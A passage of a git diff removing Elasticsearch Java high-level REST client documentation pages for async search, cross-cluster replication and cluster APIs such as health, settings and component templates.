-include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The definition of the search to run -<2> The target indices for the search - -==== Optional arguments -The following arguments can optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-arguments] --------------------------------------------------- -<1> The minimum time that the request should wait before -returning a partial result (defaults to 1 second). -<2> The expiration time of the request (defaults to 5 days). -<3> Controls whether the results should be stored if the request -completed within the provided `wait_for_completion` time (default: false) - -[id="{upid}-{api}-sync"] -==== Synchronous Execution - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-execute] --------------------------------------------------- -<1> Execute the request and get back the response as an +{response}+ object. - -[id="{upid}-{api}-async"] -==== Asynchronous Execution - -The asynchronous execution of a +{request}+ allows to use an -`ActionListener` to be called back when the submit request returns. Note -that this is does not concern the execution of the submitted search request, -which always executes asynchronously. The listener, however, waits for the -submit request itself to come back: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-execute-async] --------------------------------------------------- -<1> The +{request}+ to execute and the `ActionListener` to use when -the execution completes - -The asynchronous method does not block and returns immediately. Once it is -completed the `ActionListener` is called back using the `onResponse` method -if the execution successfully completed or using the `onFailure` method if -it failed. - -A typical listener for +{response}+ looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. The response is -provided as an argument -<2> Called in case of failure. The raised exception is provided as an argument - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ allows to retrieve information about the executed - operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> The `SearchResponse`, or `null` if not available yet -<2> The id of the async search request, `null` if the response isn't stored -<3> `true` when the response contains partial results -<4> `true` when the search is still running -<5> The time the response was created (millis since epoch) -<6> The time the response expires (millis since epoch) -<7> Get failure reasons or `null` for no failures diff --git a/docs/java-rest/high-level/ccr/delete_auto_follow_pattern.asciidoc b/docs/java-rest/high-level/ccr/delete_auto_follow_pattern.asciidoc deleted file mode 100644 index 49aee815b89..00000000000 --- a/docs/java-rest/high-level/ccr/delete_auto_follow_pattern.asciidoc +++ /dev/null @@ -1,32 +0,0 @@ --- -:api: ccr-delete-auto-follow-pattern -:request: DeleteAutoFollowPatternRequest -:response: AcknowledgedResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Delete Auto Follow Pattern API - -[id="{upid}-{api}-request"] -==== Request - -The Delete Auto Follow Pattern API allows you to delete an auto follow pattern. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The name of the auto follow pattern to delete. - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ indicates if the delete auto follow pattern request was received. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Whether or not the delete auto follow pattern request was acknowledged. - -include::../execution.asciidoc[] diff --git a/docs/java-rest/high-level/ccr/forget_follower.asciidoc b/docs/java-rest/high-level/ccr/forget_follower.asciidoc deleted file mode 100644 index b889993a4e9..00000000000 --- a/docs/java-rest/high-level/ccr/forget_follower.asciidoc +++ /dev/null @@ -1,45 +0,0 @@ --- -:api: ccr-forget-follower -:request: ForgetFollowerRequest -:response: BroadcastResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Forget Follower API - -[id="{upid}-{api}-request"] -==== Request - -The Forget Follower API allows you to manually remove the follower retention -leases from the leader. Note that these retention leases are automatically -managed by the following index. This API exists only for cases when invoking -the unfollow API on the follower index is unable to remove the follower -retention leases. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The name of the cluster containing the follower index. -<2> The name of the follower index. -<3> The UUID of the follower index (can be obtained from index stats). -<4> The alias of the remote cluster containing the leader index. -<5> The name of the leader index. - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ indicates if the response was successful. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> The high-level shards summary. -<2> The total number of shards the request was executed on. -<3> The total number of shards the request was successful on. -<4> The total number of shards the request was skipped on (should always be zero). -<5> The total number of shards the request failed on. -<6> The shard-level failures. - -include::../execution.asciidoc[] diff --git a/docs/java-rest/high-level/ccr/get_auto_follow_pattern.asciidoc b/docs/java-rest/high-level/ccr/get_auto_follow_pattern.asciidoc deleted file mode 100644 index 98c9e541019..00000000000 --- a/docs/java-rest/high-level/ccr/get_auto_follow_pattern.asciidoc +++ /dev/null @@ -1,35 +0,0 @@ --- -:api: ccr-get-auto-follow-pattern -:request: GetAutoFollowPatternRequest -:response: GetAutoFollowPatternResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Get Auto Follow Pattern API - -[id="{upid}-{api}-request"] -==== Request - -The Get Auto Follow Pattern API allows you to get a specified auto follow pattern -or all auto follow patterns. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The name of the auto follow pattern to get. - Use the default constructor to get all auto follow patterns. - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ includes the requested auto follow pattern or -all auto follow patterns if default constructor or request class was used. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Get the requested pattern from the list of returned patterns - -include::../execution.asciidoc[] diff --git a/docs/java-rest/high-level/ccr/get_follow_info.asciidoc b/docs/java-rest/high-level/ccr/get_follow_info.asciidoc deleted file mode 100644 index 70a71c1c90b..00000000000 --- a/docs/java-rest/high-level/ccr/get_follow_info.asciidoc +++ /dev/null @@ -1,35 +0,0 @@ --- -:api: ccr-get-follow-info -:request: FollowInfoRequest -:response: FollowInfoResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Get Follow Info API - - -[id="{upid}-{api}-request"] -==== Request - -The Get Follow Info API allows you to get follow information (parameters and status) for specific follower indices. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The follower index to get follow information for. - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ includes follow information for the specified follower indices - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> The follow information for specified follower indices. - -include::../execution.asciidoc[] - - diff --git a/docs/java-rest/high-level/ccr/get_follow_stats.asciidoc b/docs/java-rest/high-level/ccr/get_follow_stats.asciidoc deleted file mode 100644 index a510a53b70c..00000000000 --- a/docs/java-rest/high-level/ccr/get_follow_stats.asciidoc +++ /dev/null @@ -1,35 +0,0 @@ --- -:api: ccr-get-follow-stats -:request: FollowStatsRequest -:response: FollowStatsResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Get Follow Stats API - - -[id="{upid}-{api}-request"] -==== Request - -The Get Follow Stats API allows you to get follow statistics for specific follower indices. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The follower index to get follow statistics for. - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ includes follow statistics for the specified follower indices - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> The follow stats for specified follower indices. - -include::../execution.asciidoc[] - - diff --git a/docs/java-rest/high-level/ccr/get_stats.asciidoc b/docs/java-rest/high-level/ccr/get_stats.asciidoc deleted file mode 100644 index 6c8502302fc..00000000000 --- a/docs/java-rest/high-level/ccr/get_stats.asciidoc +++ /dev/null @@ -1,37 +0,0 @@ --- -:api: ccr-get-stats -:request: CcrStatsRequest -:response: CcrStatsResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Get CCR Stats API - - -[id="{upid}-{api}-request"] -==== Request - -The Get CCR Stats API allows you to get statistics about index following and auto following. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The request accepts no parameters. - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ always includes index follow statistics of all follow indices and -auto follow statistics. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> The follow stats of active follower indices. -<2> The auto follow stats of the cluster that has been queried. - -include::../execution.asciidoc[] - - diff --git a/docs/java-rest/high-level/ccr/pause_auto_follow_pattern.asciidoc b/docs/java-rest/high-level/ccr/pause_auto_follow_pattern.asciidoc deleted file mode 100644 index 2d40e4e9c4a..00000000000 --- a/docs/java-rest/high-level/ccr/pause_auto_follow_pattern.asciidoc +++ /dev/null @@ -1,32 +0,0 @@ --- -:api: ccr-pause-auto-follow-pattern -:request: PauseAutoFollowPatternRequest -:response: AcknowledgedResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Pause Auto Follow Pattern API - -[id="{upid}-{api}-request"] -==== Request - -The Pause Auto Follow Pattern API allows you to pause an existing auto follow pattern. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The name of the auto follow pattern. - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ indicates if the pause auto follow pattern request was received. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Whether or not the pause auto follow pattern request was acknowledged. - -include::../execution.asciidoc[] diff --git a/docs/java-rest/high-level/ccr/pause_follow.asciidoc b/docs/java-rest/high-level/ccr/pause_follow.asciidoc deleted file mode 100644 index 70694da0e81..00000000000 --- a/docs/java-rest/high-level/ccr/pause_follow.asciidoc +++ /dev/null @@ -1,35 +0,0 @@ --- -:api: ccr-pause-follow -:request: PauseFollowRequest -:response: AcknowledgedResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Pause Follow API - - -[id="{upid}-{api}-request"] -==== Request - -The Pause Follow API allows you to pause following by follow index name. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The name of follow index. - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ indicates if the pause follow request was received. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Whether or not the pause follow was acknowledge. - -include::../execution.asciidoc[] - - diff --git a/docs/java-rest/high-level/ccr/put_auto_follow_pattern.asciidoc b/docs/java-rest/high-level/ccr/put_auto_follow_pattern.asciidoc deleted file mode 100644 index a57b26738a4..00000000000 --- a/docs/java-rest/high-level/ccr/put_auto_follow_pattern.asciidoc +++ /dev/null @@ -1,38 +0,0 @@ --- -:api: ccr-put-auto-follow-pattern -:request: PutAutoFollowPatternRequest -:response: AcknowledgedResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Put Auto Follow Pattern API - -[id="{upid}-{api}-request"] -==== Request - -The Put Auto Follow Pattern API allows you to store auto follow patterns in order -to automatically follow leader indices in a remote clusters matching certain -index name patterns. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The name of the auto follow pattern. -<2> The name of the remote cluster. -<3> The leader index patterns. -<4> The pattern used to create the follower index -<5> The settings overrides for the follower index - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ indicates if the put auto follow pattern request was received. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Whether or not the put auto follow pattern request was acknowledged. - -include::../execution.asciidoc[] diff --git a/docs/java-rest/high-level/ccr/put_follow.asciidoc b/docs/java-rest/high-level/ccr/put_follow.asciidoc deleted file mode 100644 index 68b0d4fbddc..00000000000 --- a/docs/java-rest/high-level/ccr/put_follow.asciidoc +++ /dev/null @@ -1,42 +0,0 @@ --- -:api: ccr-put-follow -:request: PutFollowRequest -:response: PutFollowResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Put Follow API - - -[id="{upid}-{api}-request"] -==== Request - -The Put Follow API allows creates a follower index and make that index follow a leader index. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The name of the remote cluster alias. -<2> The name of the leader in the remote cluster. -<3> The name of the follower index that gets created as part of the put follow API call. -<4> The number of active shard copies to wait for before the put follow API returns a -response, as an `ActiveShardCount` -<5> The settings overrides for the follower index. - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ indicates if the put follow request was received. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Whether the follower index was created. -<2> Whether the follower shards are started. -<3> Whether the follower index started following the leader index. - -include::../execution.asciidoc[] - - diff --git a/docs/java-rest/high-level/ccr/resume_auto_follow_pattern.asciidoc b/docs/java-rest/high-level/ccr/resume_auto_follow_pattern.asciidoc deleted file mode 100644 index 8bc24ead277..00000000000 --- a/docs/java-rest/high-level/ccr/resume_auto_follow_pattern.asciidoc +++ /dev/null @@ -1,33 +0,0 @@ --- -:api: ccr-resume-auto-follow-pattern -:request: ResumeAutoFollowPatternRequest -:response: AcknowledgedResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Resume Auto Follow Pattern API - -[id="{upid}-{api}-request"] -==== Request - -The Resume Auto Follow Pattern API allows you to resume the activity - for a pause auto follow pattern. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The name of the auto follow pattern. - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ indicates if the resume auto follow pattern request was received. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Whether or not the resume auto follow pattern request was acknowledged. - -include::../execution.asciidoc[] diff --git a/docs/java-rest/high-level/ccr/resume_follow.asciidoc b/docs/java-rest/high-level/ccr/resume_follow.asciidoc deleted file mode 100644 index e30f83115fa..00000000000 --- a/docs/java-rest/high-level/ccr/resume_follow.asciidoc +++ /dev/null @@ -1,35 +0,0 @@ --- -:api: ccr-resume-follow -:request: ResumeFollowRequest -:response: AcknowledgedResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Resume Follow API - - -[id="{upid}-{api}-request"] -==== Request - -The Resume Follow API allows you to resume following a follower index that has been paused. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The name of follower index. - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ indicates if the resume follow request was received. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Whether or not the resume follow was acknowledged. - -include::../execution.asciidoc[] - - diff --git a/docs/java-rest/high-level/ccr/unfollow.asciidoc b/docs/java-rest/high-level/ccr/unfollow.asciidoc deleted file mode 100644 index 946a2c6e618..00000000000 --- a/docs/java-rest/high-level/ccr/unfollow.asciidoc +++ /dev/null @@ -1,36 +0,0 @@ --- -:api: ccr-unfollow -:request: UnfollowRequest -:response: AcknowledgedResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Unfollow API - - -[id="{upid}-{api}-request"] -==== Request - -The Unfollow API allows you to unfollow a follower index and make it a regular index. -Note that the follower index needs to be paused and the follower index needs to be closed. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The name of follow index to unfollow. - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ indicates if the unfollow request was received. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Whether or not the unfollow was acknowledge. - -include::../execution.asciidoc[] - - diff --git a/docs/java-rest/high-level/cluster/delete_component_template.asciidoc b/docs/java-rest/high-level/cluster/delete_component_template.asciidoc deleted file mode 100644 index 9655123d9a0..00000000000 --- a/docs/java-rest/high-level/cluster/delete_component_template.asciidoc +++ /dev/null @@ -1,41 +0,0 @@ --- -:api: delete-component-template -:request: DeleteComponentTemplateRequest -:response: AcknowledgedResponse --- - -[id="{upid}-{api}"] -=== Delete Component Template API - -[id="{upid}-{api}-request"] -==== Request - -The Delete Component Template API allows you to delete a component template. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The name of the component template to delete. - -=== Optional arguments -The following arguments can optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-masterTimeout] --------------------------------------------------- -<1> Timeout to connect to the master node as a `TimeValue` - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ indicates if the delete component template request was received. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Whether or not the delete component template request was acknowledged. - -include::../execution.asciidoc[] diff --git a/docs/java-rest/high-level/cluster/get_component_template.asciidoc b/docs/java-rest/high-level/cluster/get_component_template.asciidoc deleted file mode 100644 index f112431b0c2..00000000000 --- a/docs/java-rest/high-level/cluster/get_component_template.asciidoc +++ /dev/null @@ -1,42 +0,0 @@ --- -:api: get-component-templates -:request: GetComponentTemplatesRequest -:response: GetComponentTemplatesResponse --- - -[id="{upid}-{api}"] -=== Get Component Templates API - -The Get Component Templates API allows to retrieve information about one or more component templates. - -[id="{upid}-{api}-request"] -==== Get Component Templates Request - -A +{request}+ specifies one component template name to retrieve. -To return all component templates omit the name altogether. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> A single component template name - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-masterTimeout] --------------------------------------------------- -<1> Timeout to connect to the master node as a `TimeValue` -<2> Timeout to connect to the master node as a `String` - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Get Component Templates Response - -The returned +{response}+ consists a map of component template names and their corresponding definition. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> A map of matching component template names and the corresponding definitions diff --git a/docs/java-rest/high-level/cluster/get_settings.asciidoc b/docs/java-rest/high-level/cluster/get_settings.asciidoc deleted file mode 100644 index 407d33f8fc8..00000000000 --- a/docs/java-rest/high-level/cluster/get_settings.asciidoc +++ /dev/null @@ -1,63 +0,0 @@ --- -:api: get-settings -:request: ClusterGetSettingsRequest -:response: ClusterGetSettingsResponse --- - -[id="{upid}-{api}"] -=== Cluster Get Settings API - -The Cluster Get Settings API allows to get the cluster wide settings. - -[id="{upid}-{api}-request"] -==== Cluster Get Settings Request - -A +{request}+: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- - -==== Optional arguments -The following arguments can optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-includeDefaults] --------------------------------------------------- -<1> By default only those settings that were explicitly set are returned. Setting this to true also returns -the default settings. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-local] --------------------------------------------------- -<1> By default the request goes to the master of the cluster to get the latest results. If local is specified it gets -the results from whichever node the request goes to. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-masterTimeout] --------------------------------------------------- -<1> Timeout to connect to the master node as a `TimeValue` -<2> Timeout to connect to the master node as a `String` - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Cluster Get Settings Response - -The returned +{response}+ allows to retrieve information about the -executed operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Get the persistent settings. -<2> Get the transient settings. -<3> Get the default settings (returns empty settings if `includeDefaults` was not set to `true`). -<4> Get the value as a `String` for a particular setting. The order of searching is first in `persistentSettings` then in -`transientSettings` and finally, if not found in either, in `defaultSettings`. - diff --git a/docs/java-rest/high-level/cluster/health.asciidoc b/docs/java-rest/high-level/cluster/health.asciidoc deleted file mode 100644 index 06163fca52d..00000000000 --- a/docs/java-rest/high-level/cluster/health.asciidoc +++ /dev/null @@ -1,177 +0,0 @@ --- -:api: health -:request: ClusterHealthRequest -:response: ClusterHealthResponse --- - -[id="{upid}-{api}"] -=== Cluster Health API - -The Cluster Health API allows getting cluster health. - -[id="{upid}-{api}-request"] -==== Cluster Health Request - -A +{request}+: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -There are no required parameters. By default, the client will check all indices and will not wait -for any events. - -==== Indices - -Indices which should be checked can be passed in the constructor: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-indices-ctr] --------------------------------------------------- - -Or using the corresponding setter method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-indices-setter] --------------------------------------------------- - -==== Other parameters - -Other parameters can be passed only through setter methods: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-timeout] --------------------------------------------------- -<1> Timeout for the request as a `TimeValue`. Defaults to 30 seconds -<2> As a `String` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-master-timeout] --------------------------------------------------- -<1> Timeout to connect to the master node as a `TimeValue`. Defaults to the same as `timeout` -<2> As a `String` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-wait-status] --------------------------------------------------- -<1> The status to wait (e.g. `green`, `yellow`, or `red`). Accepts a `ClusterHealthStatus` value. -<2> Using predefined method - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-wait-events] --------------------------------------------------- -<1> The priority of the events to wait for. Accepts a `Priority` value. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-level] --------------------------------------------------- -<1> The level of detail of the returned health information. Accepts a +{request}.Level+ value. -Default value is `cluster`. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-wait-relocation] --------------------------------------------------- -<1> Wait for 0 relocating shards. Defaults to `false` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-wait-initializing] --------------------------------------------------- -<1> Wait for 0 initializing shards. Defaults to `false` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-wait-nodes] --------------------------------------------------- -<1> Wait for `N` nodes in the cluster. Defaults to `0` -<2> Using `>=N`, `<=N`, `>N` and ` Using `ge(N)`, `le(N)`, `gt(N)`, `lt(N)` notation - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-wait-active] --------------------------------------------------- - -<1> Wait for all shards to be active in the cluster -<2> Wait for `N` shards to be active in the cluster - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-local] --------------------------------------------------- -<1> Non-master node can be used for this request. Defaults to `false` - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Cluster Health Response - -The returned +{response}+ contains the next information about the -cluster: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response-general] --------------------------------------------------- -<1> Name of the cluster -<2> Cluster status (`green`, `yellow` or `red`) - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response-request-status] --------------------------------------------------- -<1> Whether request was timed out while processing -<2> Status of the request (`OK` or `REQUEST_TIMEOUT`). Other errors will be thrown as exceptions - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response-nodes] --------------------------------------------------- -<1> Number of nodes in the cluster -<2> Number of data nodes in the cluster - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response-shards] --------------------------------------------------- -<1> Number of active shards -<2> Number of primary active shards -<3> Number of relocating shards -<4> Number of initializing shards -<5> Number of unassigned shards -<6> Number of unassigned shards that are currently being delayed -<7> Percent of active shards - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response-task] --------------------------------------------------- -<1> Maximum wait time of all tasks in the queue -<2> Number of currently pending tasks -<3> Number of async fetches that are currently ongoing - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response-indices] --------------------------------------------------- -<1> Detailed information about indices in the cluster - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response-index] --------------------------------------------------- -<1> Detailed information about a specific index - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response-shard-details] --------------------------------------------------- -<1> Detailed information about a specific shard \ No newline at end of file diff --git a/docs/java-rest/high-level/cluster/put_component_template.asciidoc b/docs/java-rest/high-level/cluster/put_component_template.asciidoc deleted file mode 100644 index 10858f3b4fa..00000000000 --- a/docs/java-rest/high-level/cluster/put_component_template.asciidoc +++ /dev/null @@ -1,64 +0,0 @@ --- -:api: put-component-template -:request: PutComponentTemplateRequest -:response: AcknowledgedResponse --- - -[id="{upid}-{api}"] -=== Put Component Template API - -The Put Component Template API allows to create or change a component template. - -[id="{upid}-{api}-request"] -==== Put Component Template Request - -A +{request}+ specifies the name of the component template and the template definition, -which can consist of the settings, mappings or aliases, together with a version (which -can be used to simply component template management by external systems) and a metadata -map consisting of user specific information. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The name of the component template -<2> Template configuration containing the settings, mappings and aliases for this component template - -===== Version -A component template can optionally specify a version number which can be used to simplify template -management by external systems. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-version] --------------------------------------------------- -<1> The version number of the template - -=== Optional arguments -The following arguments can optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-create] --------------------------------------------------- -<1> To force to only create a new template; do not overwrite the existing template - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-masterTimeout] --------------------------------------------------- -<1> Timeout to connect to the master node as a `TimeValue` - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Put Component Templates Response - -The returned +{response}+ allows to retrieve information about the -executed operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Indicates whether all of the nodes have acknowledged the request diff --git a/docs/java-rest/high-level/cluster/put_settings.asciidoc b/docs/java-rest/high-level/cluster/put_settings.asciidoc deleted file mode 100644 index bc9abc62456..00000000000 --- a/docs/java-rest/high-level/cluster/put_settings.asciidoc +++ /dev/null @@ -1,93 +0,0 @@ --- -:api: put-settings -:request: ClusterUpdateSettingsRequest -:response: ClusterUpdateSettingsResponse --- - -[id="{upid}-{api}"] -=== Cluster Update Settings API - -The Cluster Update Settings API allows to update cluster wide settings. - -[id="{upid}-{api}-request"] -==== Cluster Update Settings Request - -A +{request}+: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- - -==== Cluster Settings -At least one setting to be updated must be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-cluster-settings] --------------------------------------------------- -<1> Sets the transient settings to be applied -<2> Sets the persistent setting to be applied - -==== Providing the Settings -The settings to be applied can be provided in different ways: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-create-settings] --------------------------------------------------- -<1> Creates a transient setting as `Settings` -<2> Creates a persistent setting as `Settings` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-settings-builder] --------------------------------------------------- -<1> Settings provided as `Settings.Builder` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-settings-source] --------------------------------------------------- -<1> Settings provided as `String` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-settings-map] --------------------------------------------------- -<1> Settings provided as a `Map` - -==== Optional Arguments -The following arguments can optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- 